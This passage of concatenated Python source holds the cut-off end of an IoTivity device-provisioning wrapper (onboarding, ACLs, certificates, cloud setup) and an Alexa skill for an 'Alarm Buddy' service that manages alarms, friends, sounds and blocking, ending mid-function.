self.lib.py_reset_device.argtypes = [String]
self.lib.py_reset_device.restype = None
self.lib.py_reset_device(device)
#remove owned uuid form resource list
for key in self.resourcelist.keys():
if key == device:
del self.resourcelist[device]
break
self.purge_device_array(device)
def offboard_all_owned(self):
print ("listing onboarded devices:")
self.list_owned_devices()
print ("offboarding...")
self.lib.py_reset_device.argtypes = [String]
self.lib.py_reset_device.restype = None
for device in self.owned_devices:
device_name = self.get_device_name(device)
print ("Offboarding device :", device, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_reset_device(device)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Offboarding succeeded for: {device} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Offboarding failed for: {device} {device_name}")
time.sleep(1)
print ("...done.")
def provision_ace_cloud_access(self, device_uuid):
self.lib.py_provision_ace_cloud_access.argtypes = [String]
self.lib.py_provision_ace_cloud_access.restype = None
device_name = self.get_device_name(device_uuid)
print( "provision_ace_cloud_access (ACL):",device_uuid)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_ace_cloud_access(device_uuid)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning ACE cloud access succeeded for: {device_uuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning ACE cloud access failed for: {device_uuid} {device_name}")
time.sleep(1)
def provision_ace_d2dserverlist(self, device_uuid):
self.lib.py_provision_ace_cloud_access.argtypes = [String]
self.lib.py_provision_ace_cloud_access.restype = None
device_name = self.get_device_name(device_uuid)
print( "provision_ace_d2dserverlist (ACL):",device_uuid)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_ace_d2dserverlist(device_uuid)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning ACE /d2dserverlist succeeded for: {device_uuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning ACE /d2dserverlist failed for: {device_uuid} {device_name}")
time.sleep(1)
def provision_ace_device_resources(self, chili_uuid, cloud_proxy_uuid):
# Grant cloud_proxy (aka subject) access to all Chili resources
self.lib.py_provision_ace_device_resources.argtypes = [String, String]
self.lib.py_provision_ace_device_resources.restype = None
self.lib.py_provision_ace_device_resources(chili_uuid, cloud_proxy_uuid)
chili_name = self.get_device_name(chili_uuid)
cloud_proxy_name = self.get_device_name(cloud_proxy_uuid)
print (f"py_provision_ace_device_resources (ACL) for: {chili_uuid} {chili_name}")
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_ace_device_resources(chili_uuid, cloud_proxy_uuid)
start_time = time.time()
timeout = 30
time.sleep(3)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning ACE device resources (ACL) succeeded for: {chili_uuid} {chili_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning ACE device resources (ACL) failed for: {chili_uuid} {chili_name}")
time.sleep(3)
for device in self.owned_devices:
print ("offboard device :", device)
self.lib.py_reset_device(device)
print ("...done.")
def provision_pairwise(self, device1_uuid, device2_uuid):
self.lib.py_provision_pairwise_credentials.argtypes = [String, String]
self.lib.py_provision_pairwise_credentials.restype = None
self.lib.py_provision_pairwise_credentials(str(device1_uuid),str(device2_uuid))
def provision_ace(self, target_uuid, subject_uuid, href, crudn):
self.lib.py_provision_ace2.argtypes = [String, String, String, String]
self.lib.py_provision_ace2.restype = None
self.lib.py_provision_ace2(target_uuid,subject_uuid,href,crudn)
def provision_ace_cloud_access(self, device_uuid):
self.lib.py_provision_ace_cloud_access.argtypes = [String]
self.lib.py_provision_ace_cloud_access.restype = None
print( "provision_ace_cloud_access (ACL):",device_uuid)
self.lib.py_provision_ace_cloud_access(device_uuid)
def provision_ace_all(self):
print ("provision_ace_all....")
for device in self.owned_devices:
self.provision_ace_cloud_access(device)
print ("provision_ace_all...done.")
def provision_ace_cloud_proxy(self, cloud_proxy_uuid):
print ("provision_ace_cloud_proxy....")
self.provision_ace_cloud_access(cloud_proxy_uuid)
self.provision_ace_d2dserverlist(cloud_proxy_uuid)
print ("provision_ace_cloud_proxy...done.")
def provision_ace_chili(self, chili_uuid, cloud_proxy_uuid):
print ("provision_ace_chili....")
self.provision_ace_device_resources(chili_uuid, cloud_proxy_uuid)
print ("provision_ace_chili...done.")
def provision_id_cert(self, device_uuid):
self.lib.py_provision_id_cert.argtypes = [String]
self.lib.py_provision_id_cert.restype = None
device_name = self.get_device_name(device_uuid)
print( "py_provision_id_cert:", device_uuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_id_cert(device_uuid)
start_time = time.time()
timeout = 20
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning id certs succeeded for: {device_uuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning id certs failed for: {device_uuid} {device_name}")
time.sleep(1)
def provision_id_cert_all(self):
print ("provision_id_cert_all....")
for device in self.owned_devices:
self.provision_id_cert(device)
print ("provision_id_cert_all...done.")
def provision_role_cert(self, uuid, role, auth):
self.lib.py_provision_role_cert.argtypes = [String, String, String]
self.lib.py_provision_role_cert.restype = None
self.lib.py_provision_role_cert(uuid, role, auth)
def discover_resources(self, myuuid):
self.lib.py_discover_resources.argtypes = [String]
self.lib.py_discover_resources.restype = None
device_name = self.get_device_name(myuuid)
print( "py_discover_resources:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_discover_resources(myuuid)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Resource discovery succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Resource discovery failed for: {myuuid} {device_name}")
time.sleep(1)
try:
ret = {myuuid:self.resourcelist[myuuid]}
except Exception as e:
print("Exception: {} Re-trying resource discovery".format(e))
print("RET:{}".format(ret))
return ret
def retrieve_acl2(self, myuuid):
self.lib.py_retrieve_acl2.argtypes = [String]
self.lib.py_retrieve_acl2.restype = None
device_name = self.get_device_name(myuuid)
print( "py_retrieve_acl2:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_retrieve_acl2(myuuid)
start_time = time.time()
timeout = 15
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Retrieving ACL2 succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Retrieving ACL2 failed for: {myuuid} {device_name}")
time.sleep(1)
def provision_cloud_trust_anchor(self, myuuid, cloud_id, cloud_trust_anchor):
self.lib.py_provision_cloud_trust_anchor.argtypes = [String, String, String]
self.lib.py_provision_cloud_trust_anchor.restype = None
device_name = self.get_device_name(myuuid)
print( "py_provision_cloud_trust_anchor:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_cloud_trust_anchor(myuuid, cloud_id, cloud_trust_anchor)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning cloud trust anchor succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning cloud trust anchor failed for: {myuuid} {device_name}")
time.sleep(1)
def provision_cloud_config_info(self, myuuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id):
self.lib.py_provision_cloud_config_info.argtypes = [String, String, String, String, String]
self.lib.py_provision_cloud_config_info.restype = None
device_name = self.get_device_name(myuuid)
print( "py_provision_cloud_config_info:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_provision_cloud_config_info(myuuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Provisioning cloud config info succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Provisioning cloud config info failed for: {myuuid} {device_name}")
time.sleep(10)
def retrieve_d2dserverlist(self, myuuid):
self.lib.py_retrieve_d2dserverlist.argtypes = [String]
self.lib.py_retrieve_d2dserverlist.restype = None
device_name = self.get_device_name(myuuid)
print( "py_retrieve_d2dserverlist:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_retrieve_d2dserverlist(myuuid)
start_time = time.time()
timeout = 10
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Retrieving /d2dserverlist succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Retrieving /d2dserverlist failed for: {myuuid} {device_name}")
time.sleep(1)
def post_d2dserverlist(self, myuuid, query):
self.lib.py_post_d2dserverlist.argtypes = [String, String]
self.lib.py_post_d2dserverlist.restype = None
device_name = self.get_device_name(myuuid)
print( "py_post_d2dserverlist:", myuuid, device_name)
run_count = 0
result = False
while run_count < 5 and not result:
run_count += 1
self.lib.py_post_d2dserverlist(myuuid, query)
start_time = time.time()
timeout = 20
time.sleep(1)
while True:
result = self.get_result()
end_time = time.time()
if result or end_time > start_time + timeout:
time_taken = end_time - start_time
break
if result:
print (f"Posting /d2dserverlist succeeded for: {myuuid} {device_name}")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Posting /d2dserverlist failed for: {myuuid} {device_name}")
time.sleep(1)
def get_idd(self, myuuid):
print("get_idd ", myuuid)
self.discover_resources(myuuid)
time.sleep(3)
def get_obt_uuid(self):
self.lib.py_get_obt_uuid.restype = String
obt_uuid = self.lib.py_get_obt_uuid()
return str(obt_uuid)
#resources = self.resourcelist.get(myuuid)
print("get_idd ", self.resourcelist)
#resources = self.resourcelist.get(myuuid)
print("resources :", isinstance(self.resourcelist, dict))
for l_uuid, value in self.resourcelist.items():
print(" uuid in list", l_uuid)
if l_uuid == myuuid:
print (" ", value)
def my_sleep(self):
while True:
time.sleep(3)
def test_security(self):
very_start_time = time.time()
expected_devices = 13
url = 'https://192.168.202.112:8443/.well-known/cloud-configuration'
r = requests.get(url, verify=False)
content = r.json()
cloud_id = content['cloudId']
cloud_trust_anchor = content['cloudCertificateAuthorities']
cloud_apn = content['cloudAuthorizationProvider']
cloud_cis = content['cloudUrl']
cloud_access_token = "test"
run_count = 0
nr_owned = 0
while run_count < 5 and nr_owned < expected_devices:
run_count += 1
start_time = time.time()
timeout = 20
self.discover_all()
self.onboard_cloud_proxy()
self.onboard_chili()
time.sleep(1)
while True:
nr_owned = self.get_nr_owned_devices()
end_time = time.time()
if nr_owned >= expected_devices or end_time > start_time + timeout:
time_taken = end_time - start_time
break
time.sleep(1)
if nr_owned >= expected_devices:
print (f"Discovery and onboarding succeeded, {nr_owned}/{expected_devices} devices onboarded")
print (f"Time taken: {time_taken:.3} seconds")
else:
print (f"Discovery and onboarding failed, {nr_owned}/{expected_devices} devices onboarded")
self.offboard_all_owned()
time.sleep(3)
sys.exit(1)
self.provision_id_cert_all()
cloud_proxy_uuid = self.get_owned_uuid(0)
self.provision_ace_cloud_proxy(cloud_proxy_uuid)
self.discover_resources(cloud_proxy_uuid)
self.retrieve_acl2(cloud_proxy_uuid)
self.provision_cloud_trust_anchor(cloud_proxy_uuid, cloud_id, cloud_trust_anchor)
self.provision_cloud_config_info(cloud_proxy_uuid, cloud_access_token, cloud_apn, cloud_cis, cloud_id)
for i in range(1, self.get_nr_owned_devices()):
chili_uuid = self.get_owned_uuid(i)
self.provision_ace_chili(chili_uuid, cloud_proxy_uuid)
time.sleep(5)
self.retrieve_acl2(chili_uuid)
time.sleep(5)
self.post_d2dserverlist(cloud_proxy_uuid, "di=" + chili_uuid)
time.sleep(10)
# self.retrieve_d2dserverlist(cloud_proxy_uuid)
# time.sleep(5)
proxy_time = time.time() - very_start_time
print (f"Total time taken to proxy all devices to the cloud: {proxy_time:.3} seconds")
while True:
pass
def get_doxm(self,uuid):
device = self.get_device(uuid)
if device:
print(device.uuid, device.owned_state)
#self.lib.discover_doxm.argtypes = [String]
#self.lib.discover_doxm.restype = None
self.lib.discover_doxm()
def client_command(self,uuid,device_type,command,resource,value):
if len(uuid) and len(resource):
print(colored(20*" "+"Client Command->Target:{}-->Type:{}-->Res:{}-->Cmd:{}-->Val:{}"+20*" ",'yellow',attrs=['underline']).format(uuid,device_type,resource,command,value))
#self.lib.py_post.argtypes = [String]
#self.lib.py_post.restype = None
#self.lib.py_post(uuid,command)
self.lib.discover_resource.argtypes = [String,String]
self.lib.discover_resource.restype = None
self.lib.discover_resource(resource,uuid)
time.sleep(1)
self.lib.change_light.argtypes = [c_int]
self.lib.change_light.restype = None
self.lib.change_light(value)
return "ok"
else:
return "error"
def test_discovery(self):
self.discover_all()
print ("sleeping after discovery issued..")
time.sleep(3)
self.onboard_all_unowned()
time.sleep(3)
my_uuid = self.get_owned_uuid(0)
#self.discover_resources(my_uuid)
self.get_idd(my_uuid)
time.sleep(3)
self.offboard_all_owned()
#my_iotivity = Iotivity()
#signal.signal(signal.SIGINT, my_iotivity.sig_handler)
# need this sleep, because it takes a while to start Iotivity in C in a Thread
#time.sleep(1)
#my_iotivity.test_security()
#my_iotivity.test_discovery()
#my_iotivity.quit()
|
alexa.py | # Alexa Pi script.
# 4/12/2021
import sounddevice as sd
from scipy.io.wavfile import write
import json
import logging
import os
import time
import requests
from ask_sdk_core.utils import is_intent_name, get_slot_value
import sched
import time
from flask import Flask
from flask_ask import Ask, request, session, question, statement
from playsound import playsound
import threading
from pydub import AudioSegment
import os
token = ''
# Flask-Ask set up
app = Flask(__name__)
ask = Ask(app, "/")
logging.getLogger('flask_ask').setLevel(logging.DEBUG)
with open('config.json', 'r') as f:
config = json.load(f)
scheduler = sched.scheduler(time.time, time.sleep)
@ask.launch
def launch():
global token
login_url = config['base_url'] + "/login"
login_data = config['alarmbuddy_account']
x = requests.post(login_url, data = login_data)
if(x.status_code != 200):
speech_text = 'Sorry, I could not log into Alarm Buddy. Please try again later.'
return statement(speech_text).simple_card(speech_text)
token = x.json()['token']
speech_text = 'Welcome to Alarm Buddy. Would you like to create an alarm? Or you can ask for help.'
return question(speech_text).reprompt(speech_text).simple_card(speech_text)
@ask.intent('AMAZON.FallbackIntent')
def FallbackIntent():
# A fallback Intent. If a user says something that doesn't correspond to an intent, they're sent here.
speak_output = 'sorry I did not understand you.'
return question(speak_output).reprompt(speak_output).simple_card('FallBack', speak_output)
@ask.intent('AMAZON.CancelIntent')
def CancelIntent():
# A cancel intent to leave the Alarm Buddy app.
speak_output = "Goodbye!"
return statement(speak_output).simple_card('cancel', speak_output)
@ask.intent('AMAZON.StopIntent')
def StopIntent():
# A stop intent to leave the Alarm Buddy app.
speak_output = "Goodbye!"
return statement(speak_output).simple_card('stop', speak_output)
@ask.intent('AlarmBuddy_CreateAlarm', mapping={'day': 'day', 'timeofday': 'timeofday'})
def CreateAlarmIntent(day, timeofday):
# Creating an alarm intent. Passes in day and timeofday from Amazon Intent Slots.
if(day is None):
speak_output = "Sorry, you must specify a day for the alarm."
return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_DayError', speak_output)
elif(timeofday is None):
speak_output = "Sorry, you must specify a time of day for the alarm."
return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_TimeError', speak_output)
else:
t = time.strptime(day + " " + timeofday, "%Y-%m-%d %H:%M")
t = time.mktime(t)
if(t < time.time()):
speak_output = "Sorry, you cannot create an alarm for the past."
return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm_PastError', speak_output)
th = threading.Thread(target=scheduler.run)
scheduler_e = scheduler.enterabs(t, 1, play_alarm, ([th])) #maybe have sound id here?
speak_output = "You have created an alarm that will go off on " + day + " at " + timeofday + "."
th.start()
return question(speak_output).reprompt(speak_output).simple_card('CreateAlarm', speak_output)
@ask.intent('AlarmBuddy_Record')
def RecordAlarmIntent():
speak_output = "Okay. After I say, start, speak into the microphone... start."
th = threading.Thread(target=scheduler.run)
scheduler_e = scheduler.enter(7, 1, record_audio, ([th]))
th.start()
return statement(speak_output).simple_card('Record', speak_output)
@ask.intent('AlarmBuddy_GetFriends')
def GetFriendIntent():
speak_output = 'Your current friends are... '
friends_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
friends_header = {'Authorization': token}
f = requests.get(friends_url, headers=friends_header)
if(f.status_code != 200):
speak_output = "Sorry, I could not get your friends list at this time. Please try again later."
return question(speak_output).simple_card('getFriendsError', speak_output)
friends_list = json.loads(f.content)
if(len(friends_list) <= 0):
speak_output = "You have no friends on your account."
return question(speak_output).simple_card('getFriendsNone', speak_output)
#friends_list = [{'username2': 'amaz0n'}, {'username2': 'Don2'}, {'username2': 'jjj123769'}, {'username2': 'Johnny'}, {'username2': 'Twiggy1'}, {'username2': 'Honk_Supreme'}, {'username2': 'brianna4'}, {'username2': 'woah1'}]
for i in range(6):
if(i < len(friends_list)):
speak_output = speak_output + friends_list[i]['username2'] + ", "
speak_output = speak_output[:-2] + "."
if(len(friends_list) > 6):
speak_output = speak_output + " To see more friends, please go to the Alarmbuddy website, or the Alarmbuddy mobile app."
return question(speak_output).simple_card('getFriends', speak_output)
@ask.intent('AlarmBuddy_GetSounds')
def GetSoundsIntent():
speak_output = 'The sounds on your account are... '
sounds_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
sounds_header = {'Authorization': token}
f = requests.get(sounds_url, headers=sounds_header)
if(f.status_code != 200):
speak_output = "Sorry, I could not get your sounds list at this time. Please try again later."
return question(speak_output).simple_card('getSoundsError', speak_output)
sounds_list = json.loads(f.content)
if(len(sounds_list) <= 0):
speak_output = "You have no sounds on your account."
return question(speak_output).simple_card('getSoundsNone', speak_output)
#friends_list = [{'username2': 'amaz0n'}, {'username2': 'Don2'}, {'username2': 'jjj123769'}, {'username2': 'Johnny'}, {'username2': 'Twiggy1'}, {'username2': 'Honk_Supreme'}, {'username2': 'brianna4'}, {'username2': 'woah1'}]
for sound in sounds_list:
speak_output = speak_output + sound['soundName'] + ' with i.d. ' + str(sound['soundID']) + ', '
speak_output = speak_output[:-2] + "."
return question(speak_output).simple_card('getSounds', speak_output)
@ask.intent('AlarmBuddy_GetFriendRequests')
def GetFriendRequestsIntent():
speak_output = 'Your current requests are... '
requests_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
requests_header = {'Authorization': token}
f = requests.get(requests_url, headers=requests_header)
if(f.status_code != 200):
speak_output = "Sorry, I could not get your friend requests at this time. Please try again later."
return question(speak_output).simple_card('getFriendRequestsError', speak_output)
requests_list = json.loads(f.content)
if(len(requests_list) <= 0):
speak_output = 'You currently have no incoming friend requests.'
return question(speak_output).simple_card('getFriendRequests', speak_output)
for request in requests_list:
speak_output = speak_output + request['senderUsername'] + ", "
speak_output = speak_output[:-2] + "."
return question(speak_output).simple_card('getFriendRequests', speak_output)
@ask.intent('AlarmBuddy_GetBlockList')
def GetBlockListIntent():
speak_output = 'Your current blocked accounts are... '
getblock_url = config['base_url'] + '/getBlockList/' + config['alarmbuddy_account']['username']
getblock_header = {'Authorization': token}
f = requests.get(getblock_url, headers=getblock_header)
print(f.content)
if(f.status_code != 201):
speak_output = "Sorry, I could not get your block list at this time. Please try again later."
return question(speak_output).simple_card('getBlockListError', speak_output)
block_list = json.loads(f.content)
if(len(block_list) <= 0):
speak_output = 'You currently have nobody on your block list.'
return question(speak_output).simple_card('getBlockList', speak_output)
for block in block_list:
speak_output = speak_output + block['blocked'] + ", "
speak_output = speak_output[:-2] + "."
return question(speak_output).simple_card('getBlockList', speak_output)
@ask.intent('AlarmBuddy_SendSounds', mapping={'friend_uname' : 'friend_uname', 'sound_id' : 'sound_id'})
def SendSoundIntent(friend_uname, sound_id):
friend_uname = friend_uname.replace(" ", "")
print(sound_id)
if(friend_uname is None):
speak_output = "Sorry, you must specify a username to send a sound to."
return question(speak_output).reprompt(speak_output).simple_card('AddFriend_UnameError', speak_output)
if(sound_id is None):
speak_output = "Sorry, you must specify a recorded sound i.d. to send."
return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundIdError', speak_output)
#get list of friends
header = {"Authorization": token}
friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
friends_list = requests.get(friends_list_url, headers=header).json()
#check that recipient is a friend
friend_found = False
for friend in friends_list:
print('in friend')
print(friend)
if friend['username2'] == friend_uname:
friend_found = True
if(not friend_found):
speak_output = "Sorry, you must be friends with someone to send them an alarm."
return question(speak_output).reprompt(speak_output).simple_card('SendSound_NotFriendError', speak_output)
#get list of sounds
sound_list_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
sound_list = requests.get(sound_list_url, headers=header).json()
#find requested sound
sound_to_send = None
for sound in sound_list:
print('in sound')
print(sound)
if str(sound['soundID']) == str(sound_id):
sound_to_send = sound
if sound_to_send is None:
speak_output = "Sorry, an alarm sound with that i.d. cannot be found. Have you recorded it?"
return question(speak_output).reprompt(speak_output).simple_card('SendSound_SoundNotFoundError', speak_output)
#Send the sound.
send_sound_url = config['base_url'] + '/shareSound/' + config['alarmbuddy_account']['username'] + '/' + friend_uname + '/' + str(sound_to_send['soundID'])
u = requests.post(send_sound_url, headers=header)
if(u.status_code != 201):
speak_output = "Something went wrong. We couldn't send the sound to your friend."
return question(speak_output).reprompt(speak_output).simple_card('SendSound_Error', speak_output)
return statement('Okay. ' + sound_to_send['soundName'] + ' has been sent to ' + friend_uname)
@ask.intent('AlarmBuddy_BlockUser', mapping={'block_uname' : 'block_uname'})
def BlockUser(block_uname):
if(block_uname is None):
speak_output = "Sorry, you must specify a username to block."
return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsernameIsNone', speak_output)
#Attempt to block user
block_uname = block_uname.replace(" ", "")
header = {"Authorization": token}
block_user_url = config['base_url'] + '/blockUser/' + config['alarmbuddy_account']['username'] + '/' + block_uname
response = requests.post(block_user_url, headers=header)
if(response.status_code == 201):
speak_output = 'Okay. The user with the username ' + block_uname + ' has been blocked.'
return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsername', speak_output)
else:
speak_output = 'Sorry. Failed to block user with the username ' + block_uname
return question(speak_output).reprompt(speak_output).simple_card('BlockUser_BlockUsernameIsInvalid', speak_output)
@ask.intent('AlarmBuddy_UnblockUser', mapping={'unblock_uname' : 'unblock_uname'})
def UnblockUser(unblock_uname):
if(unblock_uname is None):
speak_output = "Sorry, you must specify a username to unblock."
return question(speak_output).reprompt(speak_output).simple_card('UnblockUser_UnblockUsernameIsNone', speak_output)
#Attempt to unblock user
unblock_uname = unblock_uname.replace(" ", "")
header = {"Authorization": token}
unblock_user_url = config['base_url'] + '/unblockUser/' + config['alarmbuddy_account']['username'] + '/' + unblock_uname
response = requests.post(unblock_user_url, headers=header)
if(response.status_code == 201):
speak_output = 'Okay. The user with the username ' + unblock_uname + ' has been unblocked.'
return question(speak_output).reprompt(speak_output).simple_card('UnBlockUser_BlockUsername', speak_output)
else:
speak_output = 'Sorry. Failed to unblock user with the username ' + unblock_uname
return question(speak_output).reprompt(speak_output).simple_card('UnBlockUser_BlockUsernameIsInvalid', speak_output)
@ask.intent('AlarmBuddy_DeleteFriend', mapping={'friend_uname' : 'friend_uname'})
def DeleteFriend(friend_uname):
if(friend_uname is None):
speak_output = "Sorry, you must specify a friend to delete."
return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_FriendIsNone', speak_output)
#get list of friends
friend_uname = friend_uname.replace(' ', '')
header = {"Authorization": token}
friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
friends_list = requests.get(friends_list_url, headers=header).json()
#check that recipient is a friend
friend_found = False
for friend in friends_list:
if friend['username2'] == friend_uname:
friend_found = True
if(not friend_found):
speak_output = "You already weren't friends with " + friend_uname + "."
return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_AlreadyNotFriends', speak_output)
#Attempt to delete friend
delete_friend_url = config['base_url'] + '/deleteFriend/' + config['alarmbuddy_account']['username'] + '/' + friend_uname
response = requests.delete(delete_friend_url, headers=header)
if(response.status_code == 201):
speak_output = 'Okay. Your friend ' + friend_uname + ' has been deleted.'
return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_Success', speak_output)
else:
speak_output = 'Sorry. Failed to delete your friend with the name ' + friend_uname
return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_SendFriendRequest', mapping={'receiver_uname' : 'receiver_uname'})
def SendFriendRequest(receiver_uname):
if(receiver_uname is None):
speak_output = "Sorry, you must specify a username to send a friend request to."
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_ReceiverIsNone', speak_output)
receiver_uname = receiver_uname.replace(" ", "")
#Check if you are already friends
#get list of friends
header = {"Authorization": token}
friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
friends_list = requests.get(friends_list_url, headers=header).json()
#check that recipient is not friend
friend_found = False
for friend in friends_list:
if friend['username2'] == receiver_uname:
friend_found = True
if(friend_found):
speak_output = "Sorry, you are already friends with " + receiver_uname + "."
return question(speak_output).reprompt(speak_output).simple_card('SendFriendRequest_AlreadyFriends', speak_output)
#Attempt to send friend request
send_request_url = config['base_url'] + '/sendRequest/' + config['alarmbuddy_account']['username'] + '/' + receiver_uname
response = requests.post(send_request_url, headers=header)
if(response.status_code == 201):
speak_output = 'Okay. Friend request has been sent to ' + receiver_uname
return question(speak_output).reprompt(speak_output).simple_card('SendFriend_Success', speak_output)
else:
speak_output = 'Sorry. Failed to send the friend request to ' + receiver_uname
return question(speak_output).reprompt(speak_output).simple_card('SendFriend_Success', speak_output)
@ask.intent('AlarmBuddy_CancelFriendRequest', mapping={'receiver_uname' : 'receiver_uname'})
def CancelFriendRequest(receiver_uname):
if(receiver_uname is None):
speak_output = "Sorry, you must specify a username to cancel a friend request for."
return question(speak_output).reprompt(speak_output).simple_card('CancelFriendRequest_ReceiverIsNone', speak_output)
receiver_uname = receiver_uname.replace(" ", "")
#Attempt to cancel friend request
header = {"Authorization": token}
cancel_request_url = config['base_url'] + '/cancelFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + receiver_uname
response = requests.post(cancel_request_url, headers=header)
if(response.status_code == 201):
speak_output = 'Okay. Friend request to ' + receiver_uname + ' has been cancelled.'
return question(speak_output).reprompt(speak_output).simple_card('CancelFriend_Success', speak_output)
else:
speak_output = 'Sorry. Failed to cancel the friend request to ' + receiver_uname + '.'
return question(speak_output).reprompt(speak_output).simple_card('CancelFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_DenyFriendRequest', mapping={'sender_uname' : 'sender_uname'})
def DenyFriendRequest(sender_uname):
if(sender_uname is None):
speak_output = "Sorry, you must specify a username to send a friend request to."
return question(speak_output).reprompt(speak_output).simple_card('DenyFriendRequest_SenderIsNone', speak_output)
#Get friend requests
sender_uname = sender_uname.replace(" ", "")
header = {"Authorization": token}
request_list_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
request_list = requests.get(request_list_url, headers=header).json()
#Verify that request exists
request_found = False
for request in request_list:
if request['senderUsername'] == sender_uname:
request_found = True
if(not request_found):
speak_output = "Sorry, no friend request was found under the username " + sender_uname + "."
return question(speak_output).reprompt(speak_output).simple_card('DenyFriendRequest_RequestNotFound', speak_output)
#Deny friend request
denyRequest_url = config['base_url'] + '/denyFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + sender_uname
response = requests.post(denyRequest_url, headers = {'Authorization' : token})
if(response.status_code == 201):
speak_output = 'Okay. Friend request from ' + sender_uname + ' + has been denied.'
return question(speak_output).reprompt(speak_output).simple_card('DenyFriend_Success', speak_output)
else:
speak_output = 'Sorry. Failed to deny the friend request from ' + sender_uname
return question(speak_output).reprompt(speak_output).simple_card('DenyFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_AcceptFriendRequest', mapping={'sender_uname' : 'sender_uname'})
def AcceptFriendRequest(sender_uname):
if(sender_uname is None):
speak_output = "Sorry, you must specify a username to accept a friend request from."
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_SenderIsNone', speak_output)
sender_uname = sender_uname.replace(" ", "")
#get list of friend requests
header = {"Authorization": token}
friendRequest_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
request_list = requests.get(friendRequest_url, headers=header).json()
#find friend request in list
request_found = False
for request in request_list:
if request['senderUsername'] == sender_uname:
request_found = True
if(not request_found):
speak_output = "Sorry, no friend request was found under the username " + sender_uname + "."
return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_RequestNotFound', speak_output)
#Attempt to accept friend request
acceptRequest_url = config['base_url'] + '/acceptFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + sender_uname
response = requests.post(acceptRequest_url, headers = {'Authorization' : token})
#Error if already friends
if(response.status_code == 403):
